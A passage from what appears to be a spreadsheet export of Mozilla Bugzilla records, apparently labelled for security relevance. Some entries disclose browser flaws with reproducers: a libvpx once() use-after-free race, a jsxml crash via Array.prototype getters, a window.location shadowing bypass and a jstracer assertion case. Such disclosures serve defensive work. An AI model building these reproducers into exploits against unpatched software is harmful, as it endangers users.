I am enable to call/use mozStorage service component, on a xulrunner 1.8.1 made from a CVS snapshot.
Reproducible: Always
Steps to Reproduce:
1. Download a CVS snapshot of xulrunner 1.8.1 (CVS tag: MOZILLA_1_8_1_RELEASE)
2. Build it with mozStorage support (ac_add_options --enable-storage in your mozconfig file).
3. In a JS file try this snippet code : var mozStor = Components.classes["@mozilla.org/storage/service;1"].getService(Components.interfaces.mozIStorageService);
4. A Javascript error append on this snippet code.
Actual Results:  
In a Javascript console the output is: "Components.classes["@mozilla.org/storage/service;1"] has no properties"
Expected Results:  
no javascript error and usefull mozStor Javascript variable.
computer's configuration : Kubuntu 6.10 (KDE) AMD64 (x86_64) version.
compiler : gcc4.1.
full mozconfig file :
. $topsrcdir/xulrunner/config/mozconfig
mk_add_options MOZ_CO_PROJECT=xulrunner
mk_add_options MOZ_OBJDIR=@TOPSRCDIR@/obj-@CONFIG_GUESS@
ac_add_options --disable-debug
ac_add_options --disable-tests
ac_add_options --disable-freetype2
ac_add_options --disable-javaxpcom
ac_add_options --enable-optimize=`-pipe\ -w\ -O2\ -g\ -fno-strict-aliasing`
ac_add_options --enable-default-toolkit=gtk2
ac_add_options --enable-xft
ac_add_options --enable-canvas
ac_add_options --enable-svg
ac_add_options --enable-storage
ac_cv_visibility_pragma=no
According to bsmedberg, the problem could come from http://lxr.mozilla.org/mozilla1.8/source/toolkit/library/Makefile.in#142 . libxul only links in storage when MOZ_PLACES is enabled, which is wrong.</t>
        </is>
      </c>
      <c r="X1089" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1090">
      <c r="A1090" t="n">
        <v>18518</v>
      </c>
      <c r="B1090" t="inlineStr">
        <is>
          <t>1999-11-10 16:18:14 -0800</t>
        </is>
      </c>
      <c r="C1090" t="inlineStr">
        <is>
          <t>[FEATURE] nsWindow user notification</t>
        </is>
      </c>
      <c r="D1090" t="inlineStr">
        <is>
          <t>2000-02-14 22:43:52 -0800</t>
        </is>
      </c>
      <c r="E1090" t="n">
        <v>1</v>
      </c>
      <c r="F1090" t="n">
        <v>1</v>
      </c>
      <c r="G1090" t="n">
        <v>3</v>
      </c>
      <c r="H1090" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1090" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1090" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K1090" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1090" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1090" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1090" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1090" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1090" t="inlineStr"/>
      <c r="Q1090" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1090" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1090" t="inlineStr">
        <is>
          <t>M14</t>
        </is>
      </c>
      <c r="T1090" t="n">
        <v>1</v>
      </c>
      <c r="U1090" t="n">
        <v>0</v>
      </c>
      <c r="V1090" t="n">
        <v>54</v>
      </c>
      <c r="W1090" t="inlineStr">
        <is>
          <t>Need support for notification when a window has received something new
trudelle - this is the bug I filed based on
http://scopus/bugsplat/show_bug.cgi?id=361657 (internal bug system used before
bugzilla).  See comments there.</t>
        </is>
      </c>
      <c r="X1090" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1091">
      <c r="A1091" t="n">
        <v>1358601</v>
      </c>
      <c r="B1091" t="inlineStr">
        <is>
          <t>2017-04-21 13:06:26 -0700</t>
        </is>
      </c>
      <c r="C1091" t="inlineStr">
        <is>
          <t>set up CI builds and tests for DevEdition on mozilla-beta</t>
        </is>
      </c>
      <c r="D1091" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E1091" t="n">
        <v>1</v>
      </c>
      <c r="F1091" t="n">
        <v>1</v>
      </c>
      <c r="G1091" t="n">
        <v>5</v>
      </c>
      <c r="H1091" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1091" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1091" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1091" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1091" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1091" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1091" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1091" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1091" t="inlineStr">
        <is>
          <t>[keep-open]</t>
        </is>
      </c>
      <c r="Q1091" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1091" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1091" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1091" t="n">
        <v>1</v>
      </c>
      <c r="U1091" t="n">
        <v>0</v>
      </c>
      <c r="V1091" t="n">
        <v>83</v>
      </c>
      <c r="W1091" t="inlineStr">
        <is>
          <t>We need this in order to enable release promotion for Dev Edition</t>
        </is>
      </c>
      <c r="X1091" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1092">
      <c r="A1092" t="n">
        <v>1218124</v>
      </c>
      <c r="B1092" t="inlineStr">
        <is>
          <t>2015-10-24 14:15:48 -0700</t>
        </is>
      </c>
      <c r="C1092" t="inlineStr">
        <is>
          <t>Race condition in |once| can cause use after free</t>
        </is>
      </c>
      <c r="D1092" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:34 -0700</t>
        </is>
      </c>
      <c r="E1092" t="n">
        <v>1</v>
      </c>
      <c r="F1092" t="n">
        <v>1</v>
      </c>
      <c r="G1092" t="n">
        <v>3</v>
      </c>
      <c r="H1092" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1092" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1092" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K1092" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L1092" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1092" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1092" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1092" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1092" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1092" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1092" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1092" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T1092" t="n">
        <v>1</v>
      </c>
      <c r="U1092" t="n">
        <v>0</v>
      </c>
      <c r="V1092" t="n">
        <v>35</v>
      </c>
      <c r="W1092" t="inlineStr">
        <is>
          <t>|once| (media\libvpx\vpx_ports\vpx_once.h) has a race condition that can cause it to read and write to a freed object.
This function is used by various en/decoder initialization functions in media\libvpx . I don't know whether any of these functions are, at present, called in more than one thread context.
Details
-------
The bug is in the handling of the deletion of the critical section object:
19: static void once(void (*func)(void))
20: {
21:     static CRITICAL_SECTION *lock;
22:     static LONG waiters;
23:     static int done;
24:     void *lock_ptr = &amp;lock;
25: 
26:     /* If the initialization is complete, return early. This isn't just an
27:      * optimization, it prevents races on the destruction of the global
28:      * lock.
29:      */
30:     if(done)
31:         return;
32: 
33:     InterlockedIncrement(&amp;waiters);
34: 
35:     /* Get a lock. We create one and try to make it the one-true-lock,
36:      * throwing it away if we lost the race.
37:      */
38: 
39:     {
40:         /* Scope to protect access to new_lock */
41:         CRITICAL_SECTION *new_lock = malloc(sizeof(CRITICAL_SECTION));
42:         InitializeCriticalSection(new_lock);
43:         if (InterlockedCompareExchangePointer(lock_ptr, new_lock, NULL) != NULL)
44:         {
45:             DeleteCriticalSection(new_lock);
46:             free(new_lock);
47:         }
48:     }
49: 
50:     /* At this point, we have a lock that can be synchronized on. We don't
51:      * care which thread actually performed the allocation.
52:      */
53: 
54:     EnterCriticalSection(lock);
55: 
56:     if (!done)
57:     {
58:         func();
59:         done = 1;
60:     }
61: 
62:     LeaveCriticalSection(lock);
63: 
64:     /* Last one out should free resources. The destructed objects are
65:      * protected by checking if(done) above.
66:      */
67:     if(!InterlockedDecrement(&amp;waiters))
68:     {
69:         DeleteCriticalSection(lock);
70:         free(lock);
71:         lock = NULL;
72:     }
73: }
such that the following race can unfold, assuming |done == 0| and |waiters == 0| initially:
   thread 1                            thread 2
   --------                            --------
   execute up to (but not into)
   line 33, then get preempted
                                       execute through line 67,
                                       find that |waiters| is now 0,
                                       then get preempted
   resume execution at line 33,
   skip creating a new critical
   section object in lines 39-48
   (because the existing one is
   still pointed to by |lock|)
   then get preempted before
   executing line 54
                                       resume execution at line 68,
                                       execute lines 69-70 (deleting and freeing
                                       the critical section), then get
                                       preempted
   resume execution at line 54,
   calling |EnterCriticalSection|
   with a deleted and freed critical
   section object
There are also some other problems in this code.
1. The |lock = NULL| on line 71 (which does not use an interlocked instruction) is not properly interlocked with respect to |InterlockedCompareExchangePointer| on line 43.
2. The early-out check at lines 30-31 is questionable. I wonder whether the interlocked instruction presumably executed by LeaveCriticalSection on line 62 necessarily forces all processors in the system (under all architectures) to read the updated value of |done|, though this appears to be the case on Intel hardware; see http://www.intel.com/content/www/us/en/architecture-and-technology/64-ia-32-architectures-software-developer-vol-3a-part-1-manual.html s.8.2.3.9.
3. |once| is hazardous because nothing prevents it from being called with different function objects in the same compilation unit. In this case, the first use would set |done == 1|, causing the second use to be skipped:
void buggy () {
   once (f);
   once (g); // g() is skipped
}
4. |once| also allows its function object to be executed more than once if |once| is called with the same function object in different compilation units:
unit1.cpp
---------
#include "vpx_once.h"
void f ();
void z1 () {
   once (f); // f() is called
}
unit2.cpp
---------
#include "vpx_once.h"
void f ();
void z2 () {
   once (f); // f() is called again
}</t>
        </is>
      </c>
      <c r="X1092" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" t="n">
        <v>354151</v>
      </c>
      <c r="B1093" t="inlineStr">
        <is>
          <t>2006-09-25 10:12:35 -0700</t>
        </is>
      </c>
      <c r="C1093" t="inlineStr">
        <is>
          <t>Bad assumptions about Array elements in jsxml.c</t>
        </is>
      </c>
      <c r="D1093" t="inlineStr">
        <is>
          <t>2006-11-10 11:37:12 -0800</t>
        </is>
      </c>
      <c r="E1093" t="n">
        <v>1</v>
      </c>
      <c r="F1093" t="n">
        <v>1</v>
      </c>
      <c r="G1093" t="n">
        <v>3</v>
      </c>
      <c r="H1093" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1093" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1093" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1093" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1093" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1093" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1093" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1093" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1093" t="inlineStr">
        <is>
          <t>[sg:critical?] gc hazard</t>
        </is>
      </c>
      <c r="Q1093" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1093" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1093" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1093" t="n">
        <v>1</v>
      </c>
      <c r="U1093" t="n">
        <v>0</v>
      </c>
      <c r="V1093" t="n">
        <v>39</v>
      </c>
      <c r="W1093" t="inlineStr">
        <is>
          <t>Consider the following example:
function getter() { return 1; }
function setter(v) { return v; }
var xml = &lt;a xmlns="foo:bar"/&gt;;
Array.prototype.__defineGetter__(0, getter);
Array.prototype.__defineSetter__(0, setter);
xml.namespace();
Currently it crashes because xml_inScopeNamespaces assumes that Array instance may only contain array elements it explicitly put there. As this example demonstrates, this is not the case since script can define a getter on Array.prototype.</t>
        </is>
      </c>
      <c r="X1093" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1094">
      <c r="A1094" t="n">
        <v>1117096</v>
      </c>
      <c r="B1094" t="inlineStr">
        <is>
          <t>2015-01-02 05:50:38 -0800</t>
        </is>
      </c>
      <c r="C1094" t="inlineStr">
        <is>
          <t>Update commander_settings.py-example again to reflect the file used in production</t>
        </is>
      </c>
      <c r="D1094" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E1094" t="n">
        <v>1</v>
      </c>
      <c r="F1094" t="n">
        <v>1</v>
      </c>
      <c r="G1094" t="n">
        <v>7</v>
      </c>
      <c r="H1094" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1094" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1094" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1094" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1094" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1094" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1094" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1094" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1094" t="inlineStr"/>
      <c r="Q1094" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1094" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1094" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1094" t="n">
        <v>1</v>
      </c>
      <c r="U1094" t="n">
        <v>0</v>
      </c>
      <c r="V1094" t="n">
        <v>2</v>
      </c>
      <c r="W1094" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1087313 +++
The in-repo example needs updating again after the latest change in bug 1112290.
https://github.com/mozilla/treeherder-service/blob/master/deployment/update/commander_settings.py-dist
[emorley@treeherderadm.private.scl3 ~]$cd /data/treeherder/src/treeherder.mozilla.org/treeherder-service/
[emorley@treeherderadm.private.scl3 treeherder-service]$ cat deployment/update/commander_settings.py
...
WEB_HOSTGROUP = 'treeherder-web'
ETL_HOSTGROUP = 'treeherder-etl'
LOG_HOSTGROUP = 'treeherder-processors'
RABBIT_HOSTGROUP = 'treeherder-rabbit'
CELERY_HOSTGROUP = ['treeherder-processors',
                    'treeherder-etl',
                    'treeherder-rabbitmq',
                   ]
...
Though waiting on bug 1086934 comment 7 before making the change.</t>
        </is>
      </c>
      <c r="X1094" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1095">
      <c r="A1095" t="n">
        <v>665548</v>
      </c>
      <c r="B1095" t="inlineStr">
        <is>
          <t>2011-06-20 08:12:39 -0700</t>
        </is>
      </c>
      <c r="C1095" t="inlineStr">
        <is>
          <t>Named frames can shadow window.location sometimes</t>
        </is>
      </c>
      <c r="D1095" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1095" t="n">
        <v>1</v>
      </c>
      <c r="F1095" t="n">
        <v>1</v>
      </c>
      <c r="G1095" t="n">
        <v>3</v>
      </c>
      <c r="H1095" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1095" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1095" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1095" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1095" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1095" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1095" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1095" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1095" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q1095" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1095" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1095" t="inlineStr">
        <is>
          <t>mozilla6</t>
        </is>
      </c>
      <c r="T1095" t="n">
        <v>1</v>
      </c>
      <c r="U1095" t="n">
        <v>0</v>
      </c>
      <c r="V1095" t="n">
        <v>32</v>
      </c>
      <c r="W1095" t="inlineStr">
        <is>
          <t>location is a non-configurable property, so if you look up window.location before there is a &lt;frame name="location"&gt; you will always get the right window.location after that.  But if you look it up for the first time _after_ such a frame exists, you will get the Window for the frame.
Effectively, the fix for bug 541530 can be circumvented by this means.</t>
        </is>
      </c>
      <c r="X1095" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" t="n">
        <v>510518</v>
      </c>
      <c r="B1096" t="inlineStr">
        <is>
          <t>2009-08-14 08:46:47 -0700</t>
        </is>
      </c>
      <c r="C1096" t="inlineStr">
        <is>
          <t>"Assertion failure: isInt32(*p), at ../jstracer.cpp:2587" with nested trees</t>
        </is>
      </c>
      <c r="D1096" t="inlineStr">
        <is>
          <t>2013-03-11 11:23:29 -0700</t>
        </is>
      </c>
      <c r="E1096" t="n">
        <v>1</v>
      </c>
      <c r="F1096" t="n">
        <v>1</v>
      </c>
      <c r="G1096" t="n">
        <v>3</v>
      </c>
      <c r="H1096" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1096" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1096" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1096" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L1096" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1096" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1096" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1096" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1096" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1096" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1096" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1096" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1096" t="n">
        <v>1</v>
      </c>
      <c r="U1096" t="n">
        <v>0</v>
      </c>
      <c r="V1096" t="n">
        <v>37</v>
      </c>
      <c r="W1096" t="inlineStr">
        <is>
          <t>var arr = [
    [0, 0, 0, 0, 0], // inner tree compiles first path
    [0, 0, 0, 0, 0],
    [0, 0, 0, 0, 0], // outer tree compiles
    [0, 0, 0, 0, 0],
    [0, 0, 0, 0, 0],
    [1, 0, 0, 0, 0], // inner tree compiles different path, assinging x = ""
                     // outer tree extends (different inner tree exit)
    [1, 0, 0, 0, 0],
    [1, 0, 0, 0, 0],
    [1, 0, 0, 0, 0], // Assertion failure: isInt32(*p), at ../jstracer.cpp:2587
    [1, 0, 0, 0, 0],
    ];
var x = 0;
for (var i = 0; i &lt; 10; i++) {
    var b = arr[i];
    for (var j = 0; j &lt; 5; j++) {
        if (b[0])
            x = "";
    }
    x = 0;
}</t>
        </is>
      </c>
      <c r="X1096" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1097">
      <c r="A1097" t="n">
        <v>1093600</v>
      </c>
      <c r="B1097" t="inlineStr">
        <is>
          <t>2014-11-04 05:13:46 -0800</t>
        </is>
      </c>
      <c r="C1097" t="inlineStr">
        <is>
          <t>REST shouldn't support multiple instances of parameters for resources which only support a single params (eg. POST bug/comment)</t>
        </is>
      </c>
      <c r="D1097" t="inlineStr">
        <is>
          <t>2014-11-10 13:21:51 -0800</t>
        </is>
      </c>
      <c r="E1097" t="n">
        <v>1</v>
      </c>
      <c r="F1097" t="n">
        <v>1</v>
      </c>
      <c r="G1097" t="n">
        <v>4</v>
      </c>
      <c r="H1097" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1097" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1097" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K1097" t="inlineStr">
        <is>
          <t>4.5.6</t>
        </is>
      </c>
      <c r="L1097" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1097" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1097" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1097" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1097" t="inlineStr"/>
      <c r="Q1097" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1097" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1097" t="inlineStr">
        <is>
          <t>Bugzilla 5.0</t>
        </is>
      </c>
      <c r="T1097" t="n">
        <v>1</v>
      </c>
      <c r="U1097" t="n">
        <v>0</v>
      </c>
      <c r="V1097" t="n">
        <v>17</v>
      </c>
      <c r="W1097" t="inlineStr">
        <is>
          <t>curl -d 'id=1091084' --data-urlencode 'comment=In production: https://hg.mozilla.org/build/mozharness/rev/6375288c157b' --data-urlencode 'login=slaveapi@mozilla.releng.tld' --data-urlencode 'password=XXXXXXXXX' 'https://bugzilla.mozilla.org/rest/bug/1091084/comment'
returned
{"documentation":"http://www.bugzilla.org/docs/tip/en/html/api/","error":true,"code":100500,"message":"Not a HASH reference at /data/www/bugzilla.mozilla.org/Bugzilla/Bug.pm line 389.\n"}
Normally this would post the comment "In production: https://hg.mozilla.org/build/mozharness/rev/6375288c157b" in bug 1091084 as user slaveapi@mozilla.releng.tld.</t>
        </is>
      </c>
      <c r="X1097" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" t="n">
        <v>227510</v>
      </c>
      <c r="B1098" t="inlineStr">
        <is>
          <t>2003-12-04 13:57:00 -0800</t>
        </is>
      </c>
      <c r="C1098" t="inlineStr">
        <is>
          <t>creation of shadowdb from editparams.cgi fails because db name entered by user is tainted</t>
        </is>
      </c>
      <c r="D1098" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:38 -0800</t>
        </is>
      </c>
      <c r="E1098" t="n">
        <v>1</v>
      </c>
      <c r="F1098" t="n">
        <v>1</v>
      </c>
      <c r="G1098" t="n">
        <v>4</v>
      </c>
      <c r="H1098" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1098" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1098" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K1098" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1098" t="inlineStr">
        <is>
          <t>Sun</t>
        </is>
      </c>
      <c r="M1098" t="inlineStr">
        <is>
          <t>SunOS</t>
        </is>
      </c>
      <c r="N1098" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1098" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1098" t="inlineStr">
        <is>
          <t>[fixed in 2.16.5] [does not affect trunk]</t>
        </is>
      </c>
      <c r="Q1098" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1098" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1098" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T1098" t="n">
        <v>1</v>
      </c>
      <c r="U1098" t="n">
        <v>0</v>
      </c>
      <c r="V1098" t="n">
        <v>9</v>
      </c>
      <c r="W1098" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020920 Netscape/7.0
Build Identifier: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.1) Gecko/20020920 Netscape/7.0
Attempt to create a shadowdb with user entered value fails 
the "is_tainted" check in globals.pl because the name of the
database has been entered by the user and is tainted.
Adding the lines
    if ($value =~ /^([-\@\w.]+)$/) {
        $value = $1;   
    }
 to sub check_shadowdb in defparams.pl before the call to
    SendSQL("CREATE DATABASE $value");
fixes the problem
Reproducible: Always
Steps to Reproduce:
1. Install bugzilla on Solaris 9 using the perl in /usr/perl5
(v5.6.1 built for sun4-solaris-64int)
2. Log in as the bugzilla administrator
3.Select edit parameters link
4. Enter a name for the shadowdb
5. Turn "queryagainstshadowdb" on
6. Select "submit changes"
7. Reauthenticate as administrator
Actual Results:  
Get this error message:
Saving new parameters
Content-type: text/html
Software error:
Attempted to send tainted string 'CREATE DATABASE backupbugs' to the database at
globals.pl line 250.
For help, please send mail to this site's webmaster, giving this error message
and the time and date of the error. [Thu Dec 4 13:43:16 2003] doeditparams.cgi:
Attempted to send tainted string 'CREATE DATABASE backupbugs' to the database at
globals.pl line 250. 
Expected Results:  
Shadow database created</t>
        </is>
      </c>
      <c r="X1098" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1099">
      <c r="A1099" t="n">
        <v>1202844</v>
      </c>
      <c r="B1099" t="inlineStr">
        <is>
          <t>2015-09-08 13:53:51 -0700</t>
        </is>
      </c>
      <c r="C1099" t="inlineStr">
        <is>
          <t>crash in nsXBLService::GetBinding</t>
        </is>
      </c>
      <c r="D1099" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:47 -0700</t>
        </is>
      </c>
      <c r="E1099" t="n">
        <v>1</v>
      </c>
      <c r="F1099" t="n">
        <v>1</v>
      </c>
      <c r="G1099" t="n">
        <v>3</v>
      </c>
      <c r="H1099" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1099" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1099" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K1099" t="inlineStr">
        <is>
          <t>36 Branch</t>
        </is>
      </c>
      <c r="L1099" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1099" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1099" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1099" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1099" t="inlineStr">
        <is>
          <t>[adv-main41+][adv-esr38.3+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1099" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1099" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1099" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T1099" t="n">
        <v>1</v>
      </c>
      <c r="U1099" t="n">
        <v>0</v>
      </c>
      <c r="V1099" t="n">
        <v>20</v>
      </c>
      <c r="W1099" t="inlineStr">
        <is>
          <t>Based on https://bugzilla.mozilla.org/show_bug.cgi?id=1197321#c5
I think baseBindingURI (which is nIURI*) is deleted object in nsXBLService::GetBinding.
If we get nested GetBinding calls, LoadBindingDocumentInfo may spin event loop, as far as I see, and that may do, well, whatever.
See Bug 1197321</t>
        </is>
      </c>
      <c r="X1099" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" t="n">
        <v>721184</v>
      </c>
      <c r="B1100" t="inlineStr">
        <is>
          <t>2012-01-25 13:01:24 -0800</t>
        </is>
      </c>
      <c r="C1100" t="inlineStr">
        <is>
          <t>Elastic searches throw errors when returning wiki docs with no current revision</t>
        </is>
      </c>
      <c r="D1100" t="inlineStr">
        <is>
          <t>2012-01-26 08:06:01 -0800</t>
        </is>
      </c>
      <c r="E1100" t="n">
        <v>1</v>
      </c>
      <c r="F1100" t="n">
        <v>1</v>
      </c>
      <c r="G1100" t="n">
        <v>5</v>
      </c>
      <c r="H1100" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1100" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1100" t="inlineStr">
        <is>
          <t>Search</t>
        </is>
      </c>
      <c r="K1100" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1100" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1100" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
